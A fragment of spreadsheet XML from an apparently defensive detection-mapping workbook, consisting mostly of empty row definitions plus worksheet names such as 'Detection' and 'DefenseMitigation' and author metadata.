        <v>8006</v>
      </c>
      <c r="B104" s="13" t="s">
        <v>528</v>
      </c>
      <c r="C104" s="13" t="s">
        <v>527</v>
      </c>
      <c r="D104" s="13" t="s">
        <v>418</v>
      </c>
      <c r="E104" s="13" t="s">
        <v>419</v>
      </c>
    </row>
    <row r="105" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A105" s="24"/>
      <c r="B105" s="13"/>
      <c r="C105" s="13"/>
      <c r="D105" s="13"/>
      <c r="E105" s="13"/>
    </row>
    <row r="106" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A106" s="24"/>
      <c r="B106" s="13"/>
      <c r="C106" s="13"/>
      <c r="D106" s="13"/>
      <c r="E106" s="13"/>
    </row>
    <row r="107" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A107" s="24"/>
      <c r="B107" s="13"/>
      <c r="C107" s="13"/>
      <c r="D107" s="13"/>
      <c r="E107" s="13"/>
    </row>
    <row r="108" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A108" s="24"/>
      <c r="B108" s="13"/>
      <c r="C108" s="13"/>
      <c r="D108" s="13"/>
      <c r="E108" s="13"/>
    </row>
    <row r="109" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A109" s="24"/>
      <c r="B109" s="13"/>
      <c r="C109" s="13"/>
      <c r="D109" s="13"/>
      <c r="E109" s="13"/>
    </row>
    <row r="110" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A110" s="24"/>
      <c r="B110" s="13"/>
      <c r="C110" s="13"/>
      <c r="D110" s="13"/>
      <c r="E110" s="13"/>
    </row>
    <row r="111" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A111" s="24"/>
      <c r="B111" s="13"/>
      <c r="C111" s="13"/>
      <c r="D111" s="13"/>
      <c r="E111" s="13"/>
    </row>
    <row r="112" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A112" s="24"/>
      <c r="B112" s="13"/>
      <c r="C112" s="13"/>
      <c r="D112" s="13"/>
      <c r="E112" s="13"/>
    </row>
    <row r="113" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A113" s="24"/>
      <c r="B113" s="13"/>
      <c r="C113" s="13"/>
      <c r="D113" s="13"/>
      <c r="E113" s="13"/>
    </row>
    <row r="114" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A114" s="24"/>
      <c r="B114" s="13"/>
      <c r="C114" s="13"/>
      <c r="D114" s="13"/>
      <c r="E114" s="13"/>
    </row>
    <row r="115" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A115" s="24"/>
      <c r="B115" s="13"/>
      <c r="C115" s="13"/>
      <c r="D115" s="13"/>
      <c r="E115" s="13"/>
    </row>
    <row r="116" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A116" s="24"/>
      <c r="B116" s="13"/>
      <c r="C116" s="13"/>
      <c r="D116" s="13"/>
      <c r="E116" s="13"/>
    </row>
    <row r="117" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A117" s="24"/>
      <c r="B117" s="13"/>
      <c r="C117" s="13"/>
      <c r="D117" s="13"/>
      <c r="E117" s="13"/>
    </row>
    <row r="118" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A118" s="24"/>
      <c r="B118" s="13"/>
      <c r="C118" s="13"/>
      <c r="D118" s="13"/>
      <c r="E118" s="13"/>
    </row>
    <row r="119" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A119" s="24"/>
      <c r="B119" s="13"/>
      <c r="C119" s="13"/>
      <c r="D119" s="13"/>
      <c r="E119" s="13"/>
    </row>
    <row r="120" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A120" s="24"/>
      <c r="B120" s="13"/>
      <c r="C120" s="13"/>
      <c r="D120" s="13"/>
      <c r="E120" s="13"/>
    </row>
    <row r="121" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A121" s="24"/>
      <c r="B121" s="13"/>
      <c r="C121" s="13"/>
      <c r="D121" s="13"/>
      <c r="E121" s="13"/>
    </row>
    <row r="122" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A122" s="24"/>
      <c r="B122" s="13"/>
      <c r="C122" s="13"/>
      <c r="D122" s="13"/>
      <c r="E122" s="13"/>
    </row>
    <row r="123" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A123" s="24"/>
      <c r="B123" s="13"/>
      <c r="C123" s="13"/>
      <c r="D123" s="13"/>
      <c r="E123" s="13"/>
    </row>
    <row r="124" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A124" s="24"/>
      <c r="B124" s="13"/>
      <c r="C124" s="13"/>
      <c r="D124" s="13"/>
      <c r="E124" s="13"/>
    </row>
    <row r="125" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A125" s="24"/>
      <c r="B125" s="13"/>
      <c r="C125" s="13"/>
      <c r="D125" s="13"/>
      <c r="E125" s="13"/>
    </row>
    <row r="126" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A126" s="24"/>
      <c r="B126" s="13"/>
      <c r="C126" s="13"/>
      <c r="D126" s="13"/>
      <c r="E126" s="13"/>
    </row>
    <row r="127" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A127" s="24"/>
      <c r="B127" s="13"/>
      <c r="C127" s="13"/>
      <c r="D127" s="13"/>
      <c r="E127" s="13"/>
    </row>
    <row r="128" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A128" s="24"/>
      <c r="B128" s="13"/>
      <c r="C128" s="13"/>
      <c r="D128" s="13"/>
      <c r="E128" s="13"/>
    </row>
    <row r="129" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A129" s="24"/>
      <c r="B129" s="13"/>
      <c r="C129" s="13"/>
      <c r="D129" s="13"/>
      <c r="E129" s="13"/>
    </row>
    <row r="130" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A130" s="24"/>
      <c r="B130" s="13"/>
      <c r="C130" s="13"/>
      <c r="D130" s="13"/>
      <c r="E130" s="13"/>
    </row>
    <row r="131" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A131" s="24"/>
      <c r="B131" s="13"/>
      <c r="C131" s="13"/>
      <c r="D131" s="13"/>
      <c r="E131" s="13"/>
    </row>
    <row r="132" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A132" s="24"/>
      <c r="B132" s="13"/>
      <c r="C132" s="13"/>
      <c r="D132" s="13"/>
      <c r="E132" s="13"/>
    </row>
    <row r="133" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A133" s="24"/>
      <c r="B133" s="13"/>
      <c r="C133" s="13"/>
      <c r="D133" s="13"/>
      <c r="E133" s="13"/>
    </row>
    <row r="134" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A134" s="24"/>
      <c r="B134" s="13"/>
      <c r="C134" s="13"/>
      <c r="D134" s="13"/>
      <c r="E134" s="13"/>
    </row>
    <row r="135" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A135" s="24"/>
      <c r="B135" s="13"/>
      <c r="C135" s="13"/>
      <c r="D135" s="13"/>
      <c r="E135" s="13"/>
    </row>
    <row r="136" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A136" s="24"/>
      <c r="B136" s="13"/>
      <c r="C136" s="13"/>
      <c r="D136" s="13"/>
      <c r="E136" s="13"/>
    </row>
    <row r="137" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A137" s="24"/>
      <c r="B137" s="13"/>
      <c r="C137" s="13"/>
      <c r="D137" s="13"/>
      <c r="E137" s="13"/>
    </row>
    <row r="138" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A138" s="24"/>
      <c r="B138" s="13"/>
      <c r="C138" s="13"/>
      <c r="D138" s="13"/>
      <c r="E138" s="13"/>
    </row>
    <row r="139" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A139" s="24"/>
      <c r="B139" s="13"/>
      <c r="C139" s="13"/>
      <c r="D139" s="13"/>
      <c r="E139" s="13"/>
    </row>
    <row r="140" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A140" s="24"/>
      <c r="B140" s="13"/>
      <c r="C140" s="13"/>
      <c r="D140" s="13"/>
      <c r="E140" s="13"/>
    </row>
    <row r="141" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A141" s="24"/>
      <c r="B141" s="13"/>
      <c r="C141" s="13"/>
      <c r="D141" s="13"/>
      <c r="E141" s="13"/>
    </row>
    <row r="142" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A142" s="24"/>
      <c r="B142" s="13"/>
      <c r="C142" s="13"/>
      <c r="D142" s="13"/>
      <c r="E142" s="13"/>
    </row>
    <row r="143" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A143" s="24"/>
      <c r="B143" s="13"/>
      <c r="C143" s="13"/>
      <c r="D143" s="13"/>
      <c r="E143" s="13"/>
    </row>
    <row r="144" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A144" s="24"/>
      <c r="B144" s="13"/>
      <c r="C144" s="13"/>
      <c r="D144" s="13"/>
      <c r="E144" s="13"/>
    </row>
    <row r="145" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A145" s="24"/>
      <c r="B145" s="13"/>
      <c r="C145" s="13"/>
      <c r="D145" s="13"/>
      <c r="E145" s="13"/>
    </row>
    <row r="146" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A146" s="24"/>
      <c r="B146" s="13"/>
      <c r="C146" s="13"/>
      <c r="D146" s="13"/>
      <c r="E146" s="13"/>
    </row>
    <row r="147" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A147" s="24"/>
      <c r="B147" s="13"/>
      <c r="C147" s="13"/>
      <c r="D147" s="13"/>
      <c r="E147" s="13"/>
    </row>
    <row r="148" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A148" s="24"/>
      <c r="B148" s="13"/>
      <c r="C148" s="13"/>
      <c r="D148" s="13"/>
      <c r="E148" s="13"/>
    </row>
    <row r="149" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A149" s="24"/>
      <c r="B149" s="13"/>
      <c r="C149" s="13"/>
      <c r="D149" s="13"/>
      <c r="E149" s="13"/>
    </row>
    <row r="150" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A150" s="24"/>
      <c r="B150" s="13"/>
      <c r="C150" s="13"/>
      <c r="D150" s="13"/>
      <c r="E150" s="13"/>
    </row>
    <row r="151" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A151" s="24"/>
      <c r="B151" s="13"/>
      <c r="C151" s="13"/>
      <c r="D151" s="13"/>
      <c r="E151" s="13"/>
    </row>
    <row r="152" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A152" s="24"/>
      <c r="B152" s="13"/>
      <c r="C152" s="13"/>
      <c r="D152" s="13"/>
      <c r="E152" s="13"/>
    </row>
    <row r="153" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A153" s="24"/>
      <c r="B153" s="13"/>
      <c r="C153" s="13"/>
      <c r="D153" s="13"/>
      <c r="E153" s="13"/>
    </row>
    <row r="154" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A154" s="24"/>
      <c r="B154" s="13"/>
      <c r="C154" s="13"/>
      <c r="D154" s="13"/>
      <c r="E154" s="13"/>
    </row>
    <row r="155" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A155" s="24"/>
      <c r="B155" s="13"/>
      <c r="C155" s="13"/>
      <c r="D155" s="13"/>
      <c r="E155" s="13"/>
    </row>
    <row r="156" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A156" s="24"/>
      <c r="B156" s="13"/>
      <c r="C156" s="13"/>
      <c r="D156" s="13"/>
      <c r="E156" s="13"/>
    </row>
    <row r="157" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A157" s="24"/>
      <c r="B157" s="13"/>
      <c r="C157" s="13"/>
      <c r="D157" s="13"/>
      <c r="E157" s="13"/>
    </row>
    <row r="158" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A158" s="24"/>
      <c r="B158" s="13"/>
      <c r="C158" s="13"/>
      <c r="D158" s="13"/>
      <c r="E158" s="13"/>
    </row>
    <row r="159" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A159" s="24"/>
      <c r="B159" s="13"/>
      <c r="C159" s="13"/>
      <c r="D159" s="13"/>
      <c r="E159" s="13"/>
    </row>
    <row r="160" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A160" s="24"/>
      <c r="B160" s="13"/>
      <c r="C160" s="13"/>
      <c r="D160" s="13"/>
      <c r="E160" s="13"/>
    </row>
    <row r="161" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A161" s="24"/>
      <c r="B161" s="13"/>
      <c r="C161" s="13"/>
      <c r="D161" s="13"/>
      <c r="E161" s="13"/>
    </row>
    <row r="162" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A162" s="24"/>
      <c r="B162" s="13"/>
      <c r="C162" s="13"/>
      <c r="D162" s="13"/>
      <c r="E162" s="13"/>
    </row>
    <row r="163" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A163" s="24"/>
      <c r="B163" s="13"/>
      <c r="C163" s="13"/>
      <c r="D163" s="13"/>
      <c r="E163" s="13"/>
    </row>
    <row r="164" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A164" s="24"/>
      <c r="B164" s="13"/>
      <c r="C164" s="13"/>
      <c r="D164" s="13"/>
      <c r="E164" s="13"/>
    </row>
    <row r="165" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A165" s="24"/>
      <c r="B165" s="13"/>
      <c r="C165" s="13"/>
      <c r="D165" s="13"/>
      <c r="E165" s="13"/>
    </row>
    <row r="166" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A166" s="24"/>
      <c r="B166" s="13"/>
      <c r="C166" s="13"/>
      <c r="D166" s="13"/>
      <c r="E166" s="13"/>
    </row>
    <row r="167" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A167" s="24"/>
      <c r="B167" s="13"/>
      <c r="C167" s="13"/>
      <c r="D167" s="13"/>
      <c r="E167" s="13"/>
    </row>
    <row r="168" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A168" s="24"/>
      <c r="B168" s="13"/>
      <c r="C168" s="13"/>
      <c r="D168" s="13"/>
      <c r="E168" s="13"/>
    </row>
    <row r="169" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A169" s="24"/>
      <c r="B169" s="13"/>
      <c r="C169" s="13"/>
      <c r="D169" s="13"/>
      <c r="E169" s="13"/>
    </row>
    <row r="170" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A170" s="24"/>
      <c r="B170" s="13"/>
      <c r="C170" s="13"/>
      <c r="D170" s="13"/>
      <c r="E170" s="13"/>
    </row>
    <row r="171" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A171" s="24"/>
      <c r="B171" s="13"/>
      <c r="C171" s="13"/>
      <c r="D171" s="13"/>
      <c r="E171" s="13"/>
    </row>
    <row r="172" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A172" s="24"/>
      <c r="B172" s="13"/>
      <c r="C172" s="13"/>
      <c r="D172" s="13"/>
      <c r="E172" s="13"/>
    </row>
    <row r="173" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A173" s="24"/>
      <c r="B173" s="13"/>
      <c r="C173" s="13"/>
      <c r="D173" s="13"/>
      <c r="E173" s="13"/>
    </row>
    <row r="174" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A174" s="24"/>
      <c r="B174" s="13"/>
      <c r="C174" s="13"/>
      <c r="D174" s="13"/>
      <c r="E174" s="13"/>
    </row>
    <row r="175" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A175" s="24"/>
      <c r="B175" s="13"/>
      <c r="C175" s="13"/>
      <c r="D175" s="13"/>
      <c r="E175" s="13"/>
    </row>
    <row r="176" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A176" s="24"/>
      <c r="B176" s="13"/>
      <c r="C176" s="13"/>
      <c r="D176" s="13"/>
      <c r="E176" s="13"/>
    </row>
    <row r="177" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A177" s="24"/>
      <c r="B177" s="13"/>
      <c r="C177" s="13"/>
      <c r="D177" s="13"/>
      <c r="E177" s="13"/>
    </row>
    <row r="178" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A178" s="24"/>
      <c r="B178" s="13"/>
      <c r="C178" s="13"/>
      <c r="D178" s="13"/>
      <c r="E178" s="13"/>
    </row>
    <row r="179" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A179" s="24"/>
      <c r="B179" s="13"/>
      <c r="C179" s="13"/>
      <c r="D179" s="13"/>
      <c r="E179" s="13"/>
    </row>
    <row r="180" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A180" s="24"/>
      <c r="B180" s="13"/>
      <c r="C180" s="13"/>
      <c r="D180" s="13"/>
      <c r="E180" s="13"/>
    </row>
    <row r="181" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A181" s="24"/>
      <c r="B181" s="13"/>
      <c r="C181" s="13"/>
      <c r="D181" s="13"/>
      <c r="E181" s="13"/>
    </row>
    <row r="182" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A182" s="24"/>
      <c r="B182" s="13"/>
      <c r="C182" s="13"/>
      <c r="D182" s="13"/>
      <c r="E182" s="13"/>
    </row>
    <row r="183" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A183" s="24"/>
      <c r="B183" s="13"/>
      <c r="C183" s="13"/>
      <c r="D183" s="13"/>
      <c r="E183" s="13"/>
    </row>
    <row r="184" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A184" s="24"/>
      <c r="B184" s="13"/>
      <c r="C184" s="13"/>
      <c r="D184" s="13"/>
      <c r="E184" s="13"/>
    </row>
    <row r="185" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A185" s="24"/>
      <c r="B185" s="13"/>
      <c r="C185" s="13"/>
      <c r="D185" s="13"/>
      <c r="E185" s="13"/>
    </row>
    <row r="186" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A186" s="24"/>
      <c r="B186" s="13"/>
      <c r="C186" s="13"/>
      <c r="D186" s="13"/>
      <c r="E186" s="13"/>
    </row>
    <row r="187" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A187" s="24"/>
      <c r="B187" s="13"/>
      <c r="C187" s="13"/>
      <c r="D187" s="13"/>
      <c r="E187" s="13"/>
    </row>
    <row r="188" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A188" s="24"/>
      <c r="B188" s="13"/>
      <c r="C188" s="13"/>
      <c r="D188" s="13"/>
      <c r="E188" s="13"/>
    </row>
    <row r="189" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A189" s="24"/>
      <c r="B189" s="13"/>
      <c r="C189" s="13"/>
      <c r="D189" s="13"/>
      <c r="E189" s="13"/>
    </row>
    <row r="190" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A190" s="24"/>
      <c r="B190" s="13"/>
      <c r="C190" s="13"/>
      <c r="D190" s="13"/>
      <c r="E190" s="13"/>
    </row>
    <row r="191" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A191" s="24"/>
      <c r="B191" s="13"/>
      <c r="C191" s="13"/>
      <c r="D191" s="13"/>
      <c r="E191" s="13"/>
    </row>
    <row r="192" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A192" s="24"/>
      <c r="B192" s="13"/>
      <c r="C192" s="13"/>
      <c r="D192" s="13"/>
      <c r="E192" s="13"/>
    </row>
    <row r="193" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A193" s="24"/>
      <c r="B193" s="13"/>
      <c r="C193" s="13"/>
      <c r="D193" s="13"/>
      <c r="E193" s="13"/>
    </row>
    <row r="194" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A194" s="24"/>
      <c r="B194" s="13"/>
      <c r="C194" s="13"/>
      <c r="D194" s="13"/>
      <c r="E194" s="13"/>
    </row>
    <row r="195" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A195" s="24"/>
      <c r="B195" s="13"/>
      <c r="C195" s="13"/>
      <c r="D195" s="13"/>
      <c r="E195" s="13"/>
    </row>
    <row r="196" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A196" s="24"/>
      <c r="B196" s="13"/>
      <c r="C196" s="13"/>
      <c r="D196" s="13"/>
      <c r="E196" s="13"/>
    </row>
    <row r="197" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A197" s="24"/>
      <c r="B197" s="13"/>
      <c r="C197" s="13"/>
      <c r="D197" s="13"/>
      <c r="E197" s="1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RatingLegend</vt:lpstr>
      <vt:lpstr>DataSourceEvents</vt:lpstr>
      <vt:lpstr>Detection</vt:lpstr>
      <vt:lpstr>DefenseMitigation</vt:lpstr>
      <vt:lpstr>TechniqueDataSourceWeights</vt:lpstr>
      <vt:lpstr>TechniqueDataSourceWeights (2)</vt:lpstr>
      <vt:lpstr>DefenseBypassWeights</vt:lpstr>
      <vt:lpstr>TechniqueApplication</vt:lpstr>
      <vt:lpstr>Knowledge base</vt:lpstr>
      <vt:lpstr>REF-DataSources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Olaf Hartong</dc:creator>
  <cp:lastModifiedBy>Olaf Hartong</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-12-27T13:18:25Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-03T21:19:21Z</dcterms:modified>
</cp:coreProperties>
</file>